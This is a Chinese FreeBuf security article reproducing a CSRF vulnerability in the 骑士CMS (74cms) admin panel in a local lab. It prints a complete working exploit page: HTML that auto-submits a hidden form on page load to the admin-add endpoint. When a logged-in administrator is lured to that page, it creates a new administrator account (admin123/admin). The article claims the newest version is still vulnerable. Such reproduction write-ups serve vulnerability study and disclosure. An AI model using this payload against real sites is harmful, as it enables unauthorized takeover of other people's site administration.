freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

骑士CMS的CSRF利用
2021-09-23 16:22:21

描述

由于存在CSRF漏洞,攻击者可以通过诱导管理员点击恶意页面从而添加管理员账户的效果(测试最新版依旧存在该漏洞)。

环境准备

官网下载最新版本进行安装(PHPstudy集成环境直接部署)1632384493_614c35ed8504622beeb2f.png!small?1632384494029

复现

①本地搭建好环境测试之后,登录后台,此时后台只有一个管理员1632384603_614c365b1f9ba539b0916.png!small?1632384603028

②通过诱导登陆了管理员的终端点击该payload:http://10.0.0.3:90/payload.html页面,即可完成添加新的管理员1632384638_614c367e37bd29fbab1d6.png!small?1632384638056

③payload 代码如下:(通过提交至该url:/index.php?m=admin&c=admin&a=add 添加一个用户名为admin123,密码为admin的管理员)

<!DOCTYPE html>

<html>

<head>

<title> CSRF </title>

<script type="text/javascript">

function exec1(){

document.getElementById('form1').submit();

}

</script>

</head>

<body onload="exec1();">

<form id="form1" action="http://10.0.0.3:90/74cms2/index.php?m=admin&c=admin&a=add" method="POST">

<input type="hidden" name="username" value="admin123" />

<input type="hidden" name="email" value="111111111@qq.com" />

<input type="hidden" name="password" value="admin" />

<input type="hidden" name="repassword" value="admin" />

<input type="hidden" name="role_id" value="1" />

</form>

</body>

</html>

验证

看到后台管理处已经添加了   admin123  账号1632384936_614c37a82d711ff4a0637.png!small?1632384936470

进行登录验证1632385022_614c37feebe28b427ead8.png!small?1632385022944

# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录